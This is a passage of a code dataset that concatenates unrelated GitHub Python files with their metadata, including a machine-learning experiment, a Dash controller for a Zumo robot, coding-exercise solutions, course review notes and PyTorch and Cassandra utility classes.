random_state=train_random)\n X_to_annotate, X_test, y_train_unknown, y_test = train_test_split(X_unseen, y_unseen, test_size=test_size,\n random_state=test_random)\n return X_existing_model, X_unseen, y_existing_model, y_unseen, X_to_annotate, X_test, y_train_unknown, y_test\n\n\ndef compute_scores(X_test, X_to_annotate, consistencies, transimporve_pipeline, y_test, y_train_unknown):\n scores = []\n for consistency in consistencies:\n transimporve_pipeline.fit(consistency)\n\n classifier_truth = neural_network.MLPClassifier()\n classifier_truth.fit(X_to_annotate, y_train_unknown.ravel())\n\n X_certain, y_certain = transimporve_pipeline.certain_data_set(return_X_y=True)\n if not X_certain is None:\n classifier_certain = neural_network.MLPClassifier()\n classifier_certain.fit(X_certain, y_certain.ravel())\n\n X_full, y_full = transimporve_pipeline.full_data_set(return_X_y=True)\n classifier_full = neural_network.MLPClassifier()\n classifier_full.fit(X_full, y_full.ravel())\n\n scores.append(classifier_truth.score(X_test, y_test))\n if X_certain is None:\n scores.append(0.0)\n else:\n scores.append(classifier_certain.score(X_test, y_test))\n scores.append(classifier_full.score(X_test, y_test))\n return scores\n\n\ndef plot_score_comparisons(certainties, consistency_min, scores):\n scores = np.array(scores).reshape(len(certainties), 3)\n data = pd.DataFrame(data=scores, index=certainties, columns=['Ground Truth', 'Certain Score', 'Full Score'])\n fig, ax = plt.subplots()\n data.plot(ax=ax)\n ax.set_xlim([consistency_min, 1])\n ax.set(xlabel='Consistency', ylabel='Accuracy')\n ax.set_title('Score Comparison', fontsize=14, fontweight='bold')\n plt.show()\n fig.savefig('score_comparison.png', transparent=False, dpi=80, inches='tight')\n ex.add_artifact('score_comparison.png')\n\n\n@ex.automain\ndef my_main(confusion_matrix, gamma, consistency_min, consistency_max, annotations_per_label):\n X, y = load_digits(return_X_y=True)\n X_existing_model, X_unseen, y_existing_model, y_unseen, X_to_annotate, X_test, y_train_unknown, y_test = create_dataset_split(\n X, y)\n existing_classifier = svm.SVC(gamma=gamma)\n existing_classifier.fit(X_existing_model, y_existing_model)\n classifier_report(existing_classifier, X_test, y_test)\n\n allLabels = np.unique(y_train_unknown)\n annotations = generate_new_annotations_confusionmatrix(confusion_matrix, allLabels, y_train_unknown,\n count=annotations_per_label,\n normalize=False)\n id_datapoint = pd.DataFrame(X_to_annotate).reset_index().values\n transimporve_pipeline = Pipeline(id_datapoint, annotations, models=[(\"MNIST SVM\", existing_classifier)])\n consistency = np.arange(consistency_min, consistency_max, 0.01)\n\n scores = compute_scores(X_test, X_to_annotate, consistency, transimporve_pipeline, y_test, y_train_unknown)\n plot_score_comparisons(consistency, consistency_min, scores)\n","repo_name":"transimprove/Transimprove","sub_path":"Experiments/SklearnExperimentDigits.py","file_name":"SklearnExperimentDigits.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"17068273903","text":"# Run this app with `python app.py` and\n# visit http://192.168.0.102:8050/ in your web browser.\n\nimport dash\n#import dash_html_components as html\nfrom dash import html\n#import dash_core_components as dcc\nfrom dash import dcc\n#import plotly.express as px\n#import pandas as pd\nimport dash_daq as daq\nimport serial\nimport time, math\nimport threading\nimport json\nimport plotly.graph_objs as go\nimport plotly\nimport logging\n\nX = [0]\nY = [0]\nprox_sensor_names = ['Left-Left', 'Left', 'Center', 'Right', 'Right-Right']\nline_sensor_values = [0, 0, 0, 0, 0]\n\nclockwise_arr = [0] * 100\ncounter_clockwise_arr = [0] * 100\n\ncounter = 0\n\nser = serial.Serial('/dev/ttyACM0') # open serial port\n#ser = serial.Serial('COM3', baudrate = 9600, timeout = 1)\n\n# variables\nzumoAngle = 0\nzumoSpeed = 0\nauto_flag = 0\n\n# Initialise the app\napp = dash.Dash(__name__)\n\n# Define the app\napp.layout = html.Div(children=[daq.Joystick(id='my-joystick', label=\"Zumo Joystick\", angle=0, size=100),\n html.Div(id='joystick-output'),\n html.Div(className='row', children=[html.Button('Automatic', id='auto_button', n_clicks=0),\n html.Button('Manual', id='manual_button', n_clicks=0),\n html.Div(id='Button output'),\n html.Div([dcc.Graph(id = 'live-graph', animate = True),\n dcc.Interval(id = 'graph-update', interval = 1000, n_intervals = 0),\n html.Div([dcc.Graph(id = 'live-barchart', animate = True),\n dcc.Interval(id = 'barchart-update', interval = 1000, n_intervals = 0)])\n])])])\n\n@app.callback(dash.dependencies.Output('live-graph', 'figure'),\n dash.dependencies.Input('graph-update', 'n_intervals'))\n\ndef update_graph_scatter(n):\n X.append(X[-1]+1)\n Y.append(Y[-1]+1)\n\n data = go.Scatter(x=list(X), y=list(Y), name='Scatter', mode='lines+markers')\n return {'data': [data],\n 'layout': go.Layout(xaxis=dict(range=[min(X), max(X)]),\n yaxis=dict(range=[min(Y), max(Y)]))}\n\n@app.callback(dash.dependencies.Output('live-barchart', 'figure'),\n [dash.dependencies.Input('barchart-update', 'n_intervals')])\n\ndef update_graph_bar(n):\n clrs = []\n colorred = 'rgb(222,0,0)'\n colorgreen = 'rgb(0,222,0)'\n for i in range(len(line_sensor_values)):\n if (line_sensor_values[i] > 5):\n clrs.append(colorred)\n else:\n clrs.append(colorgreen)\n\n traces = list()\n traces.append(plotly.graph_objs.Bar(x=prox_sensor_names, y=line_sensor_values, name='Bar', marker=dict(color=clrs)))\n layout = go.Layout(barmode='group', yaxis=dict(range=[0, max(line_sensor_values)]))\n if traces is not None and layout is not None:\n return {'data': traces, 'layout': layout}\n\n@app.callback(dash.dependencies.Output('Button output', 'children'),\n [dash.dependencies.Input('auto_button', 'n_clicks'),\n dash.dependencies.Input('manual_button', 'n_clicks')])\n\ndef displayClick(auto_button, manual_button):\n global auto_flag, clockwise_arr, counter_clockwise_arr\n msg = 'manual_button was most recently clicked'\n changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]\n if 'auto_button' in changed_id:\n msg = 'auto_button was most recently clicked'\n auto_flag = 1\n clockwise_arr = [0] * 100\n counter_clockwise_arr = [0] * 100\n elif 'manual_button' in changed_id:\n msg = 'manual_button was most recently clicked'\n auto_flag = 0\n\n return html.Div(msg)\n\n@app.callback(\n dash.dependencies.Output('joystick-output', 'children'),\n [dash.dependencies.Input('my-joystick', 'angle'),\n dash.dependencies.Input('my-joystick', 'force')])\n\ndef update_output(angle, force=0):\n print(\"update_output\")\n global zumoSpeed, zumoAngle\n if force is None:\n force = 0\n if type(angle) == int or float:\n zumoAngle = angle\n else:\n zumoAngle = 0\n\n if type(force) == int or float:\n zumoSpeed = force\n else:\n zumoSpeed = 0\n\n return ['Angle is {}'.format(angle),\n html.Br(),\n 'Force is {}'.format(zumoSpeed)]\n\ndef TransmitThread():\n print (\"transmitThread\")\n global control_params, clockwise_arr, counter_clockwise_arr\n while ser.isOpen:\n global zumoSpeed, zumoAngle, auto_flag\n if zumoAngle is None:\n zumoAngle = 0\n if zumoSpeed is None:\n zumoSpeed = 0\n joyY = math.sin(math.radians(zumoAngle))*zumoSpeed*200\n joyX = math.cos(math.radians(zumoAngle))*zumoSpeed*200\n if sum(counter_clockwise_arr) > sum(clockwise_arr):\n direction = '0'\n else:\n direction = '1'\n msg = ''\n msg = str(auto_flag) + ';' + direction + '.' + str(joyX) + ',' +str(joyY) +'\\r\\n'\n ser.write(msg.encode('ascii'))\n time.sleep(0.1)\n\ndef ReceiveThread():\n global line_sensor_values, clockwise_arr, counter_clockwise_arr, counter\n while(ser.isOpen):\n if (ser.in_waiting > 0):\n sensor = ser.readline().decode('ascii')\n data = json.loads(sensor)\n #for key in data.keys():\n #print(key + \": \" + str(data[key]))\n for i in range(len(data[\"line_sensor_values\"])):\n line_sensor_values[i] = data[\"line_sensor_values\"][i]\n counter_clockwise_arr[counter%100] = line_sensor_values[0] + line_sensor_values[1]\n clockwise_arr[counter%100] = line_sensor_values[3] + line_sensor_values[4]\n print(line_sensor_values)\n #if sum(clockwise_arr) > sum(counter_clockwise_arr):\n #print('clockwise')\n #else:\n #print('counterclockwise')\n counter += 1\n else:\n time.sleep(0.05)\n\n# Run the app\n#if __name__ == '__main__':\n #app.run_server(debug=True, host='0.0.0.0')\ndef start_app():\n #app.run_server(debug=True)\n app.server.run(port=8050, host='0.0.0.0')\n\ndef initializeThreads():\n #global zumoAngle, zumoSpeed\n #counter = 0\n #zumoAngle = 0 \n #zumoSpeed = 0\n # supress logging\n log = logging.getLogger('werkzeug')\n log.setLevel(logging.ERROR)\n \n t1 = threading.Thread(target=start_app)\n t2 = threading.Thread(target=ReceiveThread)\n t3 = threading.Thread(target=TransmitThread) \n t1.start()\n t2.start()\n t3.start()\n t1.join()\n t2.join()\n t3.join()\n\n#t1 = threading.Thread(target=TransmitThread)\n#t2 = threading.Thread(target=ReceiveThread)\n#t3 = threading.Thread(target=start_app) \n#t1.start()\n#t2.start()\n#t3.start()\n#t1.join()\n#t2.join()\n\nif __name__ == \"__main__\":\n initializeThreads()","repo_name":"TALs-Education/ZumoPi","sub_path":"ZumoPi_V01/WorkSpace/backup/WS_Zumo/zumoEmbedded/zumoEmbedded2.py","file_name":"zumoEmbedded2.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"74472382479","text":"\"\"\"\nInput: \"Hello World\"\nOutput: 5\n\n每个单词都会被 ' ' 分割。\n所以要做的是从尾向前找第一个空格。当然Python 下用 strip(' ')分割后取[-1]是最好写出来的。\n当然还要确保下尾部开始不能是' ',要找到第一个单词才行。\n\n测试用例:\nhttps://leetcode.com/problems/length-of-last-word/description/\n\n\"\"\"\nclass Solution(object):\n def lengthOfLastWord(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 0\n \n result = 0\n flag = False\n \n for i in s[::-1]:\n if i == ' ' and not flag:\n continue\n elif i == ' ' and flag:\n return result\n else:\n result += 1\n flag = True\n continue\n \n return result\n return result\n","repo_name":"HuberTRoy/leetCode","sub_path":"String/LengthOfLastWord.py","file_name":"LengthOfLastWord.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"zh","doc_type":"code","stars":1806,"dataset":"github-code","pt":"29"} +{"seq_id":"20347262852","text":"# review.py\n\n# csc 281 in winter?\n\n##### final exam #####\n\n'''\nUsual classroom\nNOT the usual time\nThurs Nov 19\n8:30-10:45\n'''\n\n##### pd tourney #####\n\n##### review #####\n\n'''\nfor any class/type:\n operators\n mutable/immutable\n functions: len(lst)\n methods: lst.append(4.5)\n\nnumbers:\n bool < int < float\n ops: +,-, *,/,//,%, ** (what is precedence?)\n +=, -=, *=, ...\n bool ops: >,<,<=,>=,==,!=\n funs: sum, abs, max, min\n\nstr:\n indexed sequence of characters\n s[i] - indexing\n s[start:stop:step] - slicing\n immutable: s=s.upper()\n ops: +, int*str\n <,>,<=,>=,.... - dictionary comparisons\n in, not in - work on substrs\n functions: len\n methods: split, upper, lower, find, count, replace\n\nlist:\n indexed sequence of items (anything)\n mutable: lst.sort()\n lst[i] - an item\n lst[start:stop:step] - a sub-list\n ops: +, int*list, list*int\n in, not in - looks for item (not sublist)\n functions: len, sum, max, min\n methods: append, index, count, pop\n sort, reverse, remove\n\nrange:\n sequence of ints (arithmetic)\n immutable\n range(n)\n range(start,stop)\n range(start,stop,step)\n used for indexed iteration \n\ndict:\n container for key:value pairs\n {key:val, key:val, ...}, {}\n mutable, keys are unique and immutable\n not ordered\n d[key]=val\n d[key] retrieves a value\n in, not in - work on keys\n funs: len\n methods: pop(key)\n\ntuple\n (item,item,,,)\n like a list, but immutable\n can be dict keys\n x,y = 2,3\n\nset:\n {item,item,item,....}\n like a list, BUT items must be unique and immutable\n not ordered\n empty set - s=set() NOT s={}\n mutable\n in, not in\n functions: len\n methods: add, remove\n\nfile:\n open(filename) - opens for reading\n open(filename,'w') - for writing\n read() - get back file as a str\n readlines() - get back list of strs\n write( string)\n close()\n\nmath\n import math\n math.pi, math.sin()\n other function, constants\n\nrandom\n import random\n randrange(start,stop)\n choice( iterable )\n seed, sample, shuffle\n\ncontrol structures:\n if\n if,(elif),else - execute EXACTLY one block\n for\n while\n loop mods: return, break, (pass, continue)\n\ntry/except:\n\n try:\n code may cause error\n except:\n run this if error occurs\n\nprint vs. return\n\nloop patterns:\n\n\"standard iteration\" uses iterators:\n\n for char in string:\n for item in list:\n for i in range(n)\n for key in dict:\n for item in set:\n\n>>> for word in \"hello how are you\":\n\tprint( word )\n\n\t\nh\n...\no\nu\n>>> \n\nword is a TERRIBLE variable name in this case\n\n>>> for word in \"hello how are you\".split():\n\tprint( word )\n\n\t\nhello\nhow\nare\nyou\n>>>\n\ncounter/index/range iteration:\nuse when you need index, location information\n\n>>> for i in range(len(s)):\n\tprint( i,s[i])\n\n\t\n0 a\n1 p\n2 p\n3 l\n4 e\n>>> \n\nnested loops\n\naccmulator:\n 0) set up iteration (visit/print items)\n 1) init accum before loop\n 2) accumulate in the loop\n 3) return accum after loop\n\nsearch pattern:\ndef\n for\n if\n return\n return\n\nthis is NEVER correct:\n\ndef \n for\n if\n return\n else\n return\n\nwhile loop:\n not clear what you are iterating over in advance\n keep track of state (variables)\n\n\nloop want body to execute at least once\n 1) loop and a half pattern\n part of the body is repeated outside loop\n 2) infinite loop pattern, while True\n if ... break inside loop\n\ndef\n return vs. print\n arguments/paramters\n\nx is paramter, 3 is the argument\n>>> def f(x):\n\treturn x*2\n>>> f(3)\n6\n\n'''\n\n\n'''\nmake this work:\n>>> matches( [3,3,5,6], [5,3])\n[ (0,1),(1,1),(2,0)]\n'''\n\ndef matches( lsta, lstb ):\n\n locs = []\n for i in range(len(lsta)):\n for j in range(len(lstb)):\n if lsta[i]==lstb[j]:\n #print( i,lsta[i],j,lstb[j])\n locs.append( (i,j) )\n return locs\n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"arpan-code/CSC-241-Introduction-to-Computer-Science-I","sub_path":"Notes/Week 10/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"21592767822","text":"#Cria uma lista digitada pelo usuário\nx = int(input(\"Quantos números tu pretende colocar?\"))\nlista = []\nfor i in range(1,x):\n lista.append(input(\"Digita ae:\"))\n ultimo = len(lista)\n if ultimo == -1:\n lista.clear()\n print(lista)\n\n","repo_name":"Davi-s-Brain/projetos_simples","sub_path":"Python/ex42.py","file_name":"ex42.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19050077693","text":"import math\nimport os.path\nimport time\nfrom typing import List, Optional\n\nimport cv2\nimport numpy as np\nimport torch\nimport torchvision.transforms.functional as F\n\n\ndef make_divisible(v: float, divisor: int, min_value: Optional[int] = None) -> int:\n \"\"\"\n This function is taken from the original tf repo.\n It ensures that all layers have a channel number that is divisible by 8\n It can be seen here:\n https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py\n \"\"\"\n if min_value is None:\n min_value = divisor\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_v < 0.9 * v:\n new_v += divisor\n return new_v\n\n\n# def auto_padding(k, s, d=1):\n# \"\"\"\n#\n# Args:\n# k: kernel size\n# s: stride\n# d: dilation\n#\n# Returns: padding value\n#\n# \"\"\"\n# return math.ceil((d*(k-1)+1-s)/2)\n\n\ndef opencv_read_image(image_path):\n image_array = cv2.imread(image_path, cv2.IMREAD_COLOR | cv2.IMREAD_IGNORE_ORIENTATION)\n image_array = cv2.cvtColor(image_array, cv2.COLOR_BGR2RGB)\n return image_array # dtype = np.uint8\n\n\ndef read_image(image_paths: List[str], add_dim=False, convert_to_tensor=False, resize=False, size=None):\n n = len(image_paths)\n if n == 1:\n # 只有一张图片\n image_array = opencv_read_image(image_paths[0])\n if add_dim:\n image_array = np.expand_dims(image_array, axis=0)\n else:\n # 多张图片\n image_list = list()\n for i in range(n):\n image = opencv_read_image(image_paths[i])\n image_list.append(image)\n image_array = np.stack(image_list, axis=0)\n if convert_to_tensor:\n image_array = image_array.astype(np.float32)\n image_array /= 255.0\n image_tensor = torch.from_numpy(image_array) # (N, H, W, C)\n image_tensor = torch.permute(image_tensor, dims=(0, 3, 1, 2)) # (N, C, H, W)\n if resize and size is not None:\n image_tensor = F.resize(image_tensor, size)\n return image_tensor\n return image_array\n\n\ndef download_file(url, model_dir):\n auto_make_dirs(model_dir)\n if os.path.exists(model_dir):\n print(f\"File '{model_dir}' already exists.\")\n else:\n print(f\"Start downloading from: {url}\")\n torch.hub.download_url_to_file(url=url, dst=model_dir)\n # r = requests.get(url, stream=True)\n # total = int(r.headers.get(\"content-length\", 0))\n # with open(model_dir, mode=\"wb\") as f, \\\n # tqdm(desc=model_path, total=total, unit='iB', unit_scale=True, unit_divisor=1024) as bar:\n # for data in r.iter_content(chunk_size=1024):\n # size = f.write(data)\n # bar.update(size)\n print(\"Download completed!\")\n\n\ndef load_state_dict_from_url(url, model_dir, map_location=None):\n download_file(url, model_dir)\n return torch.load(model_dir, map_location=map_location)\n\n\ndef get_current_format_time():\n return time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.localtime())\n\n\ndef get_format_filename(model_name: str, dataset_name: str, addition: str = None) -> str:\n return model_name + \"_\" + dataset_name + \"_\" + addition\n\n\ndef auto_make_dirs(file_path):\n dir = os.path.dirname(file_path)\n if not os.path.exists(dir):\n os.makedirs(dir)","repo_name":"calmisential/Image_Classification.pytorch","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5083783308","text":"t = int(input())\nfor _ in range(t):\n n = int(input())\n nums = list(map(int, input().split()))\n\n nums.sort()\n\n c = 1\n for i in range(len(nums)):\n while nums[i] % 2 == 0:\n nums[i] //= 2\n c *= 2\n maxi = max(nums)\n print(maxi * c + (sum(nums) - maxi))\n\n ","repo_name":"yohanse/A2SV","sub_path":"B_Divide_and_Multiply.py","file_name":"B_Divide_and_Multiply.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13647807185","text":"from __future__ import unicode_literals\n\nimport six\nimport logging\nimport requests\nfrom ..core import Episode\nfrom ..core.json import load as load_json\nfrom pyannote.core import T\nimport sys\n\n\nTVD_RESOURCE_URL = 'url'\nTVD_RESOURCE_SEASON = 'season'\nTVD_RESOURCE_EPISODE = 'episode'\nTVD_RESOURCE_SOURCE = 'source'\nTVD_RESOURCE_TYPE = 'type'\nTVD_ACKNOWLEDGEMENT = \"\"\"\nIN CASE YOU USE '{resource}' RESOURCES, PLEASE CONSIDER CITING:\n{reference}\n\"\"\"\n\n\nclass ResourceMixin(object):\n\n def init_resource(self, resources):\n\n # initialize web resources data structure\n # resources[episode] contains all resources for a given episode\n self.resources = {}\n\n # loop on web resources described in 'resources' section\n for resource_type, resource in six.iteritems(resources):\n\n if self.acknowledgment and 'source' in resource:\n sys.stdout.write(TVD_ACKNOWLEDGEMENT.format(\n resource=resource_type, reference=resource['source']))\n\n # obtain corresponding 'get_resource' method\n resource_method = self._get_resource_method(resource_type)\n\n # read resource 'source' from YAML configuration when provided\n source = resource.get(TVD_RESOURCE_SOURCE, None)\n\n # read resource 'type' from YAML configuration when provided\n data_type = resource.get(TVD_RESOURCE_TYPE, None)\n\n # loop on all provided URLs\n # NB: some episodes might not have some resources\n for url in resource.get(TVD_RESOURCE_URL, []):\n\n season_number = url[TVD_RESOURCE_SEASON]\n episode_number = url[TVD_RESOURCE_EPISODE]\n episode = Episode(\n series=self.__class__.__name__,\n season=season_number,\n episode=episode_number\n )\n\n # add episode to resource main structure\n # in case it is the first time it is encountered\n if episode not in self.resources:\n self.resources[episode] = {}\n\n # initialize resource placeholder\n self.resources[episode][resource_type] = {\n # method to call to get the resource\n 'method': resource_method,\n # parameters to pass to method to get the resource\n 'params': {\n 'url': url[TVD_RESOURCE_URL],\n 'source': source,\n 'episode': episode\n },\n # results of call \"method(**params)\"\n # NB: it is set to None until we actually get this resource\n 'result': None,\n # data type (transcription, annotation, else ?)\n 'type': data_type\n }\n\n def _get_resource_method(self, resource_type):\n \"\"\"Get method for given resource\n\n resource_type : str\n Resource type, as provided in YAML configuration file\n\n Returns\n -------\n method : callable\n Method defined in inheriting plugin to be used\n to obtain `resource_type` resource\n\n \"\"\"\n resource_method = getattr(self, resource_type, None)\n\n if resource_method is None:\n\n error = 'Class %s has no method called %s.' % (\n self.__class__.__name__, resource_type)\n\n raise ValueError(error)\n\n return resource_method\n\n def has_resource(self, resource_type, episode):\n \"\"\"\n Checks whether resource `resource_type` exists\n for given `episode`\n\n Parameters\n ----------\n resource_type : str\n episode : `tvd.Episode`\n \"\"\"\n\n resources = self.resources.get(episode, None)\n if resources is None:\n return False\n\n resource = resources.get(resource_type, None)\n if resource is None:\n return False\n\n return True\n\n def get_resource_from_disk(self, resource_type, episode):\n \"\"\"Load resource from disk, store it in memory and return it\n\n Parameters\n ----------\n episode : Episode\n Episode\n resource_type : str\n Type of resource\n\n Returns\n -------\n resource : Timeline, Annotation or Transcription\n Resource of type `resource_type` for requested episode\n\n Raises\n ------\n Exception\n If the resource is not available on disk\n\n \"\"\"\n\n msg = 'getting {t:s} for {e!s} from disk'\n logging.debug(msg.format(e=episode, t=resource_type))\n\n path = self.path_to_resource(episode, resource_type)\n result = load_json(path)\n\n msg = 'saving {t:s} for {e!s} into memory'\n logging.debug(msg.format(e=episode, t=resource_type))\n\n self.resources[episode][resource_type]['result'] = result\n\n return result\n\n def get_resource_from_memory(self, resource_type, episode):\n \"\"\"Load resource from memory\n\n Parameters\n ----------\n episode : Episode\n Episode\n resource_type : str\n Type of resource\n\n Returns\n -------\n resource : Timeline, Annotation or Transcription\n Resource of type `resource_type` for requested episode\n\n Raises\n ------\n Exception\n If the resource is not available in memory\n \"\"\"\n\n msg = 'getting {t:s} for {e!s} from memory'\n logging.debug(msg.format(e=episode, t=resource_type))\n\n result = self.resources[episode][resource_type]['result']\n\n if result is None:\n msg = 'resource {t:s} for {e!s} is not available in memory'\n raise ValueError(msg.format(e=episode, t=resource_type))\n\n return result\n\n def get_resource_from_plugin(self, resource_type, episode):\n \"\"\"Load resource from plugin, store it in memory and return it\n\n Parameters\n ----------\n episode : Episode\n Episode\n resource_type : str\n Type of resource\n\n Returns\n -------\n resource : Timeline, Annotation or Transcription\n Resource of type `resource_type` for requested episode\n\n Raises\n ------\n Exception\n If plugin failed to provide the requested resource\n \"\"\"\n\n msg = 'getting {t:s} for {e!s} from plugin'\n logging.debug(msg.format(e=episode, t=resource_type))\n\n resource = self.resources[episode][resource_type]\n method = resource['method']\n params = resource['params']\n\n T.reset()\n result = method(**params)\n\n msg = 'saving {t:s} for {e!s} into memory'\n logging.debug(msg.format(e=episode, t=resource_type))\n\n self.resources[episode][resource_type]['result'] = result\n\n return result\n\n def get_resource(self, resource_type, episode, update=False):\n \"\"\"Get resource\n\n Parameters\n ----------\n resource_type: str\n episode : Episode\n update : bool, optional\n\n Returns\n -------\n resource : Timeline, Annotation or Transcription\n Resource of type `resource_type` for requested `episode`\n\n Raises\n ------\n ValueError\n If plugin failed to provide the requested resource.\n\n \"\"\"\n\n result = None\n\n if update:\n funcs = [self.get_resource_from_plugin]\n\n else:\n funcs = [self.get_resource_from_memory,\n self.get_resource_from_disk,\n self.get_resource_from_plugin]\n\n for func in funcs:\n try:\n result = func(resource_type, episode)\n break\n\n except:\n continue\n\n if result is None:\n error = 'cannot get {t:s} for episode {e!s}'\n raise ValueError(error.format(t=resource_type, e=episode))\n\n return result\n\n def iter_resources(self, resource_type=None, episode=None,\n data=False, update=True):\n \"\"\"Resource iterator\n\n Resources are yielded in episode chronological order\n and resource name alphabetical order\n\n Parameters\n ----------\n resource_type : str, optional\n When provided, only iterate over this resource type\n episode : `tvd.Episode`, optional\n When provided, only iterate over resources for this episode\n data : boolean, optional\n Whether to yield actual data\n\n Returns\n -------\n (episode, resource_type[, data]) iterator\n \"\"\"\n\n # loop on episodes in airing chronological order\n for _episode in sorted(self.resources):\n\n # skip this episode if not requested\n if (episode is not None) and \\\n (episode != _episode):\n continue\n\n # loop on resources in name alphabetical order\n for _resource_type in sorted(self.resources[_episode]):\n\n # skip this resource if not requested\n if (resource_type is not None) and \\\n (resource_type != _resource_type):\n continue\n\n # really get this resource\n if data:\n _data = self.get_resource(_resource_type, _episode,\n update=update)\n yield _episode, _resource_type, _data\n\n else:\n yield _episode, _resource_type\n\n def get_all_resources(self, update=False):\n\n resources = {}\n\n for episode, resource_type in self.iter_resources(\n resource_type=None, episode=None, data=False\n ):\n\n if episode not in resources:\n resources[episode] = {}\n\n resource = self.get_resource(resource_type, episode, update=update)\n\n resources[episode][resource_type] = resource\n\n return resources\n\n CHARACTER_MAPPING = {\n # hyphen\n ord(u'\\u2013'): u\"-\", # –\n ord(u'\\u2014'): u\"-\", # —\n # quote\n ord(u'\\u2018'): u\"'\", # ‘\n ord(u'\\u2019'): u\"'\", # ’\n # double-quote\n ord(u'\\u201c'): u'\"', # “\n ord(u'\\u201d'): u'\"', # ”\n # space\n ord(u'\\u200b'): u\" \", #\n ord(u'\\xa0'): u\" \", #\n # other\n ord(u'\\u2026'): u\"...\", # …\n # ord(u'\\xe9'): u\"é\"\n }\n\n HTML_MAPPING = {\n # hyphen\n u\"–\": u\"-\",\n # quote\n u\"‘\": u\"'\",\n u\"’\": u\"'\",\n u\""\": '\"',\n # double-quote\n u\"“\": u'\"',\n u\"”\": u'\"',\n # other\n u\"…\": u\"...\"\n }\n\n def clean_text(self, udata):\n\n # apply mapping tables\n udata = udata.translate(self.CHARACTER_MAPPING)\n for old, new in six.iteritems(self.HTML_MAPPING):\n udata = udata.replace(old, new)\n return udata\n\n def download_as_utf8(self, url):\n \"\"\"Download webpage content as UTF-8\n\n Parameters\n ----------\n url : str\n Webpage URL\n mapping : dict\n Translation table (mapping of Unicode ordinals to Unicode ordinals\n or to Unicode strings).\n Returns\n -------\n text : unicode\n Webpage content as unicode UTF-8 text\n\n \"\"\"\n\n # request URL content with dummy user-agent\n user_agent = {'User-agent': 'TVD'}\n r = requests.get(url, headers=user_agent)\n\n # get content as UTF-8 unicode\n r.encoding = 'UTF-8'\n\n return self.clean_text(r.text)\n","repo_name":"tvd-dataset/tvd","sub_path":"tvd/plugin/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":11768,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"29"} +{"seq_id":"29199576722","text":"from libs.kp_fraydit.classes import BaseClass\nfrom libs.kp_fraydit.class_iterators import ClassIterator\n\nfrom cassandra.encoder import Encoder\n\ncql_encoder = Encoder()\n\n\nclass ApplicationFields(ClassIterator):\n def __init__(self, group_list=None):\n super().__init__(group_list=group_list, primary_key='name')\n\n @classmethod\n def from_list(cls, l: list):\n my_list = []\n for unconverted_field in l:\n my_list.append(ApplicationField.from_dict(unconverted_field))\n return cls(group_list=my_list)\n\n def convert_to_dict(self):\n d = dict()\n for field in self.objList:\n d = {**d, **field.to_dict}\n \n return d\n\n def convert_to_db_format(self):\n return cql_encoder.cql_encode_map_collection(self.convert_to_dict())\n \n\n\n\nclass ApplicationField(BaseClass):\n def __init__(self, name: str, type: str, values: set):\n self.__name = name\n self.__type = type\n self.__values = values\n\n @classmethod\n def from_db(cls, key, value):\n type, values = value.split('|')\n values_list = values.split(',')\n values_set = set(values_list)\n return cls(key, type, values_set)\n\n\n @classmethod\n def from_dict(cls, d: dict):\n if d.get('name') is not None: name = d.get('name')\n elif d.get('Name') is not None: name = d.get('Name')\n elif d.get('fieldName') is not None: name = d.get('fieldName')\n elif d.get('field_name') is not None: name = d.get('field_name')\n else: name = ''\n\n if d.get('type') is not None: type = d.get('type')\n elif d.get('Type') is not None: type= d.get('Type')\n elif d.get('fieldType') is not None: type = d.get('fieldType')\n elif d.get('field_type') is not None: type = d.get('field_type')\n else: type = ''\n\n if d.get('values') is not None: values = d.get('values')\n elif d.get('Values') is not None: values = d.get('Values')\n elif d.get('fieldValues') is not None: values = d.get('fieldValues')\n elif d.get('field_values') is not None: values = d.get('field_values')\n else: values = ''\n\n values_set = set(values)\n return cls(name, type, values_set)\n\n @property\n def name(self) -> str:\n return self.__name\n\n @property\n def type(self) -> str:\n return self.__type\n\n @property\n def values(self) -> set:\n return self.__values\n\n\n @property\n def to_dict(self) -> dict:\n d = dict()\n d[self.name] = f'{self.type}|{(\",\").join(self.values)}'\n return d","repo_name":"coldicefisher/dispatch","sub_path":"web/source_code/libs/cass_auth/applications/application_field.py","file_name":"application_field.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71558413837","text":"import torch\nimport torch.nn as nn\nfrom torchvision.models import squeezenet1_0\nfrom torchvision import transforms\nfrom PIL import Image\n\n\nclass Fire(nn.Module):\n def __init__(self, in_channels, squeeze_channels, expand1x1_channels, expand3x3_channels):\n super(Fire, self).__init__()\n\n self.squeeze = nn.Conv2d(in_channels, squeeze_channels, kernel_size=1)\n self.squeeze_activation = nn.ReLU(inplace=True)\n\n self.expand1x1 = nn.Conv2d(squeeze_channels, expand1x1_channels, kernel_size=1)\n self.expand1x1_activation = nn.ReLU(inplace=True)\n\n self.expand3x3 = nn.Conv2d(squeeze_channels, expand3x3_channels, kernel_size=3, padding=1)\n self.expand3x3_activation = 